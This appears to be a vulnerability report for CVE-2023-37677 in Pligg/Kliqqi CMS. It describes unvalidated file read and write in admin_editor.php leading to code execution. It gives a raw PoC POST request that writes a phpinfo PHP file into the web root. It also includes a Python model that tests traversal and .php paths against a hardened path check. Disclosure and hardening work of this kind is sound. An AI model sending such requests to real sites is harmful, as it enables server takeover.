CVE-2023-37677: Users with specific permissions can read arbitrary files and modify files to cause remote command execution in admin_editor.php · Issue #264 · Kliqqi-CMS/Kliqqi-CMS
Pligg CMS v2.0.2 (also known as Kliqqi) was discovered to contain a remote code execution (RCE) vulnerability in the component admin_editor.php.
admin_editor.php
Arbitrary file read: POST the_file set to the path of the file to read; the file's contents are loaded into the editor. The path is not validated or confined, so any file readable by the PHP process can be read.
Arbitrary file write leading to RCE: POST updatedfile (the new file contents) together with the_file2 (the path to write them to); the request body below uses exactly these parameter names. Because the_file2 is not confined either, a .php file can be written under the web root and then requested, which is what the PoC below does with phpinfo.php. Both operations require an account that can reach admin_editor.php (the PoC uses an admin session).
PoC request for the write/RCE case against a local phpStudy install (the request line was not included in the report; the endpoint is the one shown in Referer):
Host: 192.168.2.14
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 148
Origin: http://192.168.2.14
Connection: close
Referer: http://192.168.2.14/pligg-cms/admin/admin_editor.php
Cookie: panelState=; PHPSESSID=10b67e196207898bd4ae3032a846c574; mnm_user=admin; mnm_key=YWRtaW46MjJrTkdHVDVLbG9NWTpiMzJmYTE4Mjc1MmE2YjBiZGMwNzY3NmM3ZGZkY2UzNQ%3D%3D
Upgrade-Insecure-Requests: 1
the_file2=c:\phpstudy_pro\www\pligg-cms\phpinfo.php&updatedfile=%3C%3Fphp+phpinfo%28%29%3B%3F%3E%0D%0Ahack+TestIng%0D%0A&isempty=1&save=Save+Changes
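As an added example (not code from the issue or from Pligg/Kliqqi), the block below models the two handlers in Python: it decodes the PoC body above, shows the write target being taken verbatim from the_file2, and contrasts that with a confinement check that maps the user path into an assumed editable directory with an assumed .tpl/.css allow-list and rejects the PoC path, a traversal path, a POSIX absolute path and a .php target while still allowing a legitimate template edit and reading it back. The function names, the "templates" directory and the extension allow-list are assumptions for illustration, not Pligg's actual layout.

```python
"""Added example (not Pligg/Kliqqi code): a Python model of the two
admin_editor.php handlers described in the report, driven by the PoC request
body, next to a path-confinement check that rejects that PoC.
Function names, the 'templates' directory and the .tpl/.css allow-list are
assumptions for illustration, not Pligg's real layout."""
import os
import ntpath
import posixpath
import tempfile
from urllib.parse import parse_qs

# The POST body from the issue's request, verbatim (URL-encoded).
POC_BODY = (
    "the_file2=c:\\phpstudy_pro\\www\\pligg-cms\\phpinfo.php"
    "&updatedfile=%3C%3Fphp+phpinfo%28%29%3B%3F%3E%0D%0Ahack+TestIng%0D%0A"
    "&isempty=1&save=Save+Changes"
)


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body to a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def vulnerable_write_target(params):
    """Model of the reported behaviour: the_file2 is used as the write path
    without validation, so the caller can place updatedfile anywhere the PHP
    process can write, including a .php file under the web root."""
    return params["the_file2"], params["updatedfile"]


class ConfinementError(ValueError):
    pass


def confine(base_dir, user_path, allowed_ext=(".tpl", ".css")):
    """Map a user-supplied relative path to a real path inside base_dir.

    Rejects NUL bytes, absolute paths and drive letters in either Windows or
    POSIX form (checked regardless of host OS, since the PoC targets a
    Windows phpStudy install), anything that resolves outside base_dir after
    '..' and symlink resolution, and extensions outside the allow-list.
    """
    if "\0" in user_path:
        raise ConfinementError("NUL byte in path")
    if (ntpath.isabs(user_path) or posixpath.isabs(user_path)
            or ntpath.splitdrive(user_path)[0]):
        raise ConfinementError("absolute path rejected: %r" % user_path)
    relative = user_path.replace("\\", "/")  # treat backslashes as separators
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, relative))
    if os.path.commonpath([base, candidate]) != base or candidate == base:
        raise ConfinementError("path escapes base dir: %r" % user_path)
    if os.path.splitext(candidate)[1].lower() not in allowed_ext:
        raise ConfinementError("extension not editable: %r" % user_path)
    return candidate


def hardened_write(base_dir, params):
    """Same operation as the vulnerable handler, but the target is confined."""
    target = confine(base_dir, params["the_file2"])
    os.makedirs(os.path.dirname(target), exist_ok=True)
    with open(target, "w", encoding="utf-8", newline="") as fh:
        fh.write(params["updatedfile"])  # isempty/save flags are irrelevant here
    return target


def hardened_read(base_dir, params):
    """Confined version of the the_file read path."""
    path = confine(base_dir, params["the_file"])
    with open(path, encoding="utf-8", newline="") as fh:
        return fh.read()


def self_check():
    """Run the PoC and a few edge cases against both models; return outcomes."""
    params = parse_form(POC_BODY)
    results = {"poc_target": vulnerable_write_target(params)[0]}
    base = tempfile.mkdtemp(prefix="editor_root_")  # stands in for the template dir
    for label, path in [
        ("poc", params["the_file2"]),
        ("traversal", "../../../../etc/passwd.tpl"),
        ("php_ext", "templates/shell.php"),
        ("posix_abs", "/etc/passwd.tpl"),
    ]:
        try:
            hardened_write(base, dict(params, the_file2=path))
            results[label] = "allowed"
        except ConfinementError:
            results[label] = "rejected"
    # A legitimate edit still works and reads back through the confined reader,
    # even when the client sends a backslash-separated relative path.
    target = hardened_write(base, dict(params, the_file2="templates/custom.tpl"))
    results["legit_inside_base"] = target.startswith(os.path.realpath(base))
    results["roundtrip"] = hardened_read(base, {"the_file": "templates\\custom.tpl"})
    return results


if __name__ == "__main__":
    for key, value in self_check().items():
        print(key, "->", value)
```

The realpath-then-commonpath comparison is what actually confines the path; the absolute-path and extension checks in front of it give clearer errors and stop a Windows drive-letter path from being silently treated as a relative name on a POSIX host.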